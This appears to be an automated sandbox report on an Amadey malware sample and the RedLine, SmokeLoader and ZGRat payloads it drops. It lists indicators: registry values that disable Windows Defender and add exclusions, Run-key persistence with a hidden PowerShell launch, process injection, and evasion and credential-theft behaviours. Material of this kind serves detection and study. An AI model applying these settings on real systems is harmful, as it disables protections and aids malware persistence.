amadey | 94c8812e489dbef26d03c62a53646a5f67763f8612fb5aae3a81bcc78e9d9363

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	FE88.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	FE88.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	FE88.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	FE88.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	FE88.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ac06-95.dat	family_redline
behavioral2/files/0x000700000001ac06-96.dat	family_redline
behavioral2/memory/2252-110-0x0000000000870000-0x00000000008AE000-memory.dmp	family_redline
behavioral2/files/0x000600000001ac0c-151.dat	family_redline
behavioral2/files/0x000600000001ac0c-150.dat	family_redline
behavioral2/memory/236-158-0x0000000000B40000-0x0000000000B7E000-memory.dmp	family_redline
behavioral2/memory/1416-175-0x00000000006A0000-0x00000000006FA000-memory.dmp	family_redline
behavioral2/memory/1416-272-0x0000000000400000-0x000000000047E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 5364 created 3396	5364	latestX.exe	54
PID 5364 created 3396	5364	latestX.exe	54
PID 5364 created 3396	5364	latestX.exe	54
PID 5364 created 3396	5364	latestX.exe	54
PID 5364 created 3396	5364	latestX.exe	54
PID 1524 created 3396	1524	updater.exe	54
PID 1524 created 3396	1524	updater.exe	54
PID 1524 created 3396	1524	updater.exe	54
PID 1524 created 3396	1524	updater.exe	54
PID 1524 created 3396	1524	updater.exe	54
PID 1524 created 3396	1524	updater.exe	54

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
274	6292	schtasks.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
6180	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation	2D8A.exe

Executes dropped EXE 44 IoCs

pid	Process
4288	oi8IN07.exe
4756	1bU20VP8.exe
4804	2GN1592.exe
4440	3by11ax.exe
2804	FA7D.exe
1544	FB78.exe
800	VI6ld7KF.exe
4080	HU1sX8sI.exe
4344	PE8hr3hE.exe
2252	FD8D.exe
224	sq3Cv0TO.exe
164	FE88.exe
1804	1Ka11uG6.exe
4400	BC.exe
4520	explothe.exe
1416	466.exe
236	2lO462aT.exe
5972	353B.exe
6060	3711.exe
5416	toolspub2.exe
5772	31839b57a4f11171d6abc8bbc4451ee4.exe
6052	kos4.exe
5364	latestX.exe
6012	LzmwAqmV.exe
5816	51BE.exe
5944	LzmwAqmV.tmp
6100	toolspub2.exe
6876	sc.exe
5876	31839b57a4f11171d6abc8bbc4451ee4.exe
4420	2720.exe
6320	2D8A.exe
6912	2FDC.exe
6292	schtasks.exe
4552	explothe.exe
1524	updater.exe
964	gwdrejs
2556	csrss.exe
1124	injector.exe
4364	gwdrejs
6516	windefender.exe
5812	windefender.exe
5544	explothe.exe
4052	f801950a962ddba14caaa44bf084b55c.exe
2484	explothe.exe

Loads dropped DLL 7 IoCs

pid	Process
1416	466.exe
1416	466.exe
5944	LzmwAqmV.tmp
5944	LzmwAqmV.tmp
5944	LzmwAqmV.tmp
5816	51BE.exe
5920	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	FE88.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	oi8IN07.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	VI6ld7KF.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	ch0Lw56.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	FA7D.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	HU1sX8sI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	PE8hr3hE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	sq3Cv0TO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3711.exe'\""	3711.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
247	api.ipify.org
246	api.ipify.org

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4756 set thread context of 5044	4756	1bU20VP8.exe	73
PID 4804 set thread context of 4832	4804	2GN1592.exe	75
PID 1804 set thread context of 3556	1804	1Ka11uG6.exe	94
PID 5416 set thread context of 6100	5416	toolspub2.exe	129
PID 5816 set thread context of 6728	5816	51BE.exe	136
PID 4420 set thread context of 1100	4420	2720.exe	205
PID 964 set thread context of 4364	964	Process not Found	206
PID 1524 set thread context of 3428	1524	updater.exe	232
PID 1524 set thread context of 6508	1524	updater.exe	233

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FAudioConverter\is-H5JI5.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-AJT5T.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-OE6TV.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-9D00H.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-G1F0L.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-37Q1G.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\unins000.dat	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-I04JN.tmp	LzmwAqmV.tmp
File created	C:\Program Files (x86)\FAudioConverter\is-CEH28.tmp	LzmwAqmV.tmp
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2044	sc.exe
5388	sc.exe
6064	sc.exe
7004	sc.exe
4540	sc.exe
6692	sc.exe
5144	sc.exe
6876	sc.exe
6804	sc.exe
6436	sc.exe
6156	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
3280	4832	WerFault.exe	75
940	3556	WerFault.exe	94
4856	1416	WerFault.exe	93
6968	6728	WerFault.exe	136

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3by11ax.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gwdrejs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gwdrejs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3by11ax.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3by11ax.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gwdrejs

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4152	schtasks.exe
6292	schtasks.exe
6632	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
